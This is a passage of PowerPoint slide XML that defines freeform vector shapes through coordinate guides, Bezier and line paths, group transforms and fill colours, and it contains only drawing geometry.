                      <a:pt x="44" y="5"/>
                      <a:pt x="38" y="11"/>
                      <a:pt x="29" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="22"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0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6" name="Freeform 796"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6673" y="2278"/>
                <a:ext cx="104" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 44"/>
                  <a:gd name="T1" fmla="*/ 16 h 26"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 9 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 25 h 26"/>
                  <a:gd name="T8" fmla="*/ 28 w 44"/>
                  <a:gd name="T9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6">
                    <a:moveTo>
                      <a:pt x="28" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="11"/>
                      <a:pt x="43" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="14"/>
                      <a:pt x="1" y="20"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="26"/>
                      <a:pt x="17" y="22"/>
                      <a:pt x="28" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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7" name="Freeform 797"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6824" y="2307"/>
                <a:ext cx="130" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 30 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 55"/>
                  <a:gd name="T5" fmla="*/ 24 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 55"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 55"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 55"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 47 w 55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34">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="5"/>
                      <a:pt x="39" y="11"/>
                      <a:pt x="30" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="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8" name="Freeform 798"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6822" y="2304"/>
                <a:ext cx="109" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 46"/>
                  <a:gd name="T1" fmla="*/ 17 h 27"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 16 w 46"/>
                  <a:gd name="T5" fmla="*/ 10 h 27"/>
                  <a:gd name="T6" fmla="*/ 0 w 46"/>
                  <a:gd name="T7" fmla="*/ 25 h 27"/>
                  <a:gd name="T8" fmla="*/ 29 w 46"/>
                  <a:gd name="T9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27">
                    <a:moveTo>
                      <a:pt x="29" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="12"/>
                      <a:pt x="45" y="6"/>
                      <a:pt x="46" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="16" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="15"/>
                      <a:pt x="1" y="21"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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809" name="Group 641"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="8290560" y="3413607"/>
              <a:ext cx="909637" cy="263525"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="810" name="Freeform 642"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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1" name="Freeform 643"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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2" name="Freeform 644"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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3" name="Freeform 645"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565"/>
                  <a:gd name="T9" fmla="*/ 12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5" h="152">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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4" name="Freeform 646"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603"/>
                    </a:ln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969696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5" name="Freeform 647"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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816" name="Group 677"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8792210" y="3134207"/>
              <a:ext cx="1046162" cy="728662"/>
              <a:chOff x="-1496" y="3101"/>
              <a:chExt cx="4084" cy="2842"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="817" name="Freeform 678"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2087" y="4070"/>
                <a:ext cx="168" cy="484"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 168"/>
                  <a:gd name="T1" fmla="*/ 484 h 484"/>
                  <a:gd name="T2" fmla="*/ 0 w 168"/>
                  <a:gd name="T3" fmla="*/ 45 h 484"/>
                  <a:gd name="T4" fmla="*/ 168 w 168"/>
                  <a:gd name="T5" fmla="*/ 0 h 484"/>
                  <a:gd name="T6" fmla="*/ 168 w 168"/>
                  <a:gd name="T7" fmla="*/ 442 h 484"/>
                  <a:gd name="T8" fmla="*/ 0 w 168"/>
                  <a:gd name="T9" fmla="*/ 484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8" h="484">
                    <a:moveTo>
                      <a:pt x="0" y="484"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48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8" name="Freeform 679"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2057" y="4108"/>
                <a:ext cx="30" cy="446"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 30"/>
                  <a:gd name="T1" fmla="*/ 7 h 446"/>
                  <a:gd name="T2" fmla="*/ 0 w 30"/>
                  <a:gd name="T3" fmla="*/ 0 h 446"/>
                  <a:gd name="T4" fmla="*/ 0 w 30"/>
                  <a:gd name="T5" fmla="*/ 439 h 446"/>
                  <a:gd name="T6" fmla="*/ 30 w 30"/>
                  <a:gd name="T7" fmla="*/ 446 h 446"/>
                  <a:gd name="T8" fmla="*/ 30 w 30"/>
                  <a:gd name="T9" fmla="*/ 7 h 4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446">
                    <a:moveTo>
                      <a:pt x="30" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="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9" name="Freeform 680"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2057" y="4063"/>
                <a:ext cx="198" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 198 w 198"/>
                  <a:gd name="T1" fmla="*/ 7 h 52"/>
                  <a:gd name="T2" fmla="*/ 165 w 198"/>
                  <a:gd name="T3" fmla="*/ 0 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 198"/>
                  <a:gd name="T5" fmla="*/ 45 h 52"/>
                  <a:gd name="T6" fmla="*/ 30 w 198"/>
                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                  <a:gd name="T8" fmla="*/ 198 w 198"/>
                  <a:gd name="T9" fmla="*/ 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52">
                    <a:moveTo>
                      <a:pt x="198" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="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0" name="Freeform 681"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2033" y="3992"/>
                <a:ext cx="26" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 11"/>
                  <a:gd name="T1" fmla="*/ 2 h 13"/>
                  <a:gd name="T2" fmla="*/ 9 w 11"/>
                  <a:gd name="T3" fmla="*/ 4 h 13"/>
                  <a:gd name="T4" fmla="*/ 10 w 11"/>
                  <a:gd name="T5" fmla="*/ 12 h 13"/>
                  <a:gd name="T6" fmla="*/ 2 w 11"/>
                  <a:gd name="T7" fmla="*/ 9 h 13"/>
                  <a:gd name="T8" fmla="*/ 2 w 11"/>
                  <a:gd name="T9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2" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4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10" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="13"/>
                      <a:pt x="5" y="12"/>
                      <a:pt x="2" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0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1" name="Freeform 682"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2033" y="4672"/>
                <a:ext cx="26" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 11"/>
                  <a:gd name="T1" fmla="*/ 1 h 12"/>
                  <a:gd name="T2" fmla="*/ 9 w 11"/>
                  <a:gd name="T3" fmla="*/ 4 h 12"/>
                  <a:gd name="T4" fmla="*/ 10 w 11"/>
                  <a:gd name="T5" fmla="*/ 11 h 12"/>
                  <a:gd name="T6" fmla="*/ 2 w 11"/>
                  <a:gd name="T7" fmla="*/ 9 h 12"/>
                  <a:gd name="T8" fmla="*/ 2 w 11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2" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="7" y="1"/>
                      <a:pt x="9" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="6"/>
                      <a:pt x="11" y="10"/>
                      <a:pt x="10" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="5" y="11"/>
                      <a:pt x="2" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="6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2" name="Freeform 683"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2045" y="3940"/>
                <a:ext cx="220" cy="756"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 93"/>
                  <a:gd name="T1" fmla="*/ 25 h 320"/>
                  <a:gd name="T2" fmla="*/ 2 w 93"/>
                  <a:gd name="T3" fmla="*/ 33 h 320"/>
                  <a:gd name="T4" fmla="*/ 85 w 93"/>
                  <a:gd name="T5" fmla="*/ 10 h 320"/>
                  <a:gd name="T6" fmla="*/ 85 w 93"/>
                  <a:gd name="T7" fmla="*/ 290 h 320"/>
                  <a:gd name="T8" fmla="*/ 0 w 93"/>
                  <a:gd name="T9" fmla="*/ 312 h 320"/>
                  <a:gd name="T10" fmla="*/ 2 w 93"/>
                  <a:gd name="T11" fmla="*/ 320 h 320"/>
                  <a:gd name="T12" fmla="*/ 93 w 93"/>
                  <a:gd name="T13" fmla="*/ 296 h 320"/>
                  <a:gd name="T14" fmla="*/ 93 w 93"/>
                  <a:gd name="T15" fmla="*/ 0 h 320"/>
                  <a:gd name="T16" fmla="*/ 0 w 93"/>
                  <a:gd name="T17" fmla="*/ 25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" h="320">
                    <a:moveTo>
                      <a:pt x="0" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="33"/>
                      <a:pt x="2" y="33"/>
                      <a:pt x="2" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="33"/>
                      <a:pt x="76" y="13"/>
                      <a:pt x="85" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="20"/>
                      <a:pt x="85" y="284"/>
                      <a:pt x="85" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="291"/>
                      <a:pt x="0" y="312"/>
                      <a:pt x="0" y="312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="320"/>
                      <a:pt x="2" y="320"/>
                      <a:pt x="2" y="320"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="296"/>
                      <a:pt x="93" y="296"/>
                      <a:pt x="93" y="296"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="0"/>
                      <a:pt x="93" y="0"/>
                      <a:pt x="93" y="0"/>
                    </a:cubicBez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3" name="Freeform 684"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="344" y="5258"/>
                <a:ext cx="435" cy="435"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 435"/>
                  <a:gd name="T1" fmla="*/ 435 h 435"/>
                  <a:gd name="T2" fmla="*/ 0 w 435"/>
                  <a:gd name="T3" fmla="*/ 241 h 435"/>
                  <a:gd name="T4" fmla="*/ 435 w 435"/>
                  <a:gd name="T5" fmla="*/ 0 h 435"/>
                  <a:gd name="T6" fmla="*/ 380 w 435"/>
                  <a:gd name="T7" fmla="*/ 383 h 435"/>
                  <a:gd name="T8" fmla="*/ 187 w 435"/>
                  <a:gd name="T9" fmla="*/ 435 h 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5" h="435">
                    <a:moveTo>
                      <a:pt x="187" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="43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4" name="Freeform 685"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1449" y="4762"/>
                <a:ext cx="458" cy="449"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 458"/>
                  <a:gd name="T1" fmla="*/ 449 h 449"/>
                  <a:gd name="T2" fmla="*/ 0 w 458"/>
                  <a:gd name="T3" fmla="*/ 255 h 449"/>
                  <a:gd name="T4" fmla="*/ 458 w 458"/>
                  <a:gd name="T5" fmla="*/ 0 h 449"/>
                  <a:gd name="T6" fmla="*/ 380 w 458"/>
                  <a:gd name="T7" fmla="*/ 397 h 449"/>
                  <a:gd name="T8" fmla="*/ 187 w 458"/>
                  <a:gd name="T9" fmla="*/ 449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8" h="449">
                    <a:moveTo>
                      <a:pt x="187" y="449"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="449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5" name="Freeform 686"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="611" y="5357"/>
                <a:ext cx="498" cy="549"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 211"/>
                  <a:gd name="T1" fmla="*/ 67 h 232"/>
                  <a:gd name="T2" fmla="*/ 46 w 211"/>
                  <a:gd name="T3" fmla="*/ 15 h 232"/>
                  <a:gd name="T4" fmla="*/ 46 w 211"/>
                  <a:gd name="T5" fmla="*/ 15 h 232"/>
                  <a:gd name="T6" fmla="*/ 12 w 211"/>
                  <a:gd name="T7" fmla="*/ 23 h 232"/>
                  <a:gd name="T8" fmla="*/ 19 w 211"/>
                  <a:gd name="T9" fmla="*/ 38 h 232"/>
                  <a:gd name="T10" fmla="*/ 41 w 211"/>
                  <a:gd name="T11" fmla="*/ 164 h 232"/>
                  <a:gd name="T12" fmla="*/ 100 w 211"/>
                  <a:gd name="T13" fmla="*/ 212 h 232"/>
                  <a:gd name="T14" fmla="*/ 109 w 211"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 154 w 211"/>
                  <a:gd name="T17" fmla="*/ 220 h 232"/>
                  <a:gd name="T18" fmla="*/ 154 w 211"/>
                  <a:gd name="T19" fmla="*/ 220 h 232"/>
                  <a:gd name="T20" fmla="*/ 176 w 211"/>
                  <a:gd name="T21" fmla="*/ 209 h 232"/>
                  <a:gd name="T22" fmla="*/ 168 w 211"/>
                  <a:gd name="T23" fmla="*/ 67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1" h="232">
                    <a:moveTo>
                      <a:pt x="168" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="21"/>
                      <a:pt x="82" y="0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0" y="70"/>
                      <a:pt x="8" y="121"/>
                      <a:pt x="41" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="187"/>
                      <a:pt x="79" y="203"/>
                      <a:pt x="100" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="232"/>
                      <a:pt x="109" y="232"/>
                      <a:pt x="109" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="220"/>
                      <a:pt x="154" y="220"/>
                      <a:pt x="154" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="220"/>
                      <a:pt x="154" y="220"/>
                      <a:pt x="154" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="218"/>
                      <a:pt x="169" y="214"/>
                      <a:pt x="176" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="183"/>
                      <a:pt x="208" y="119"/>
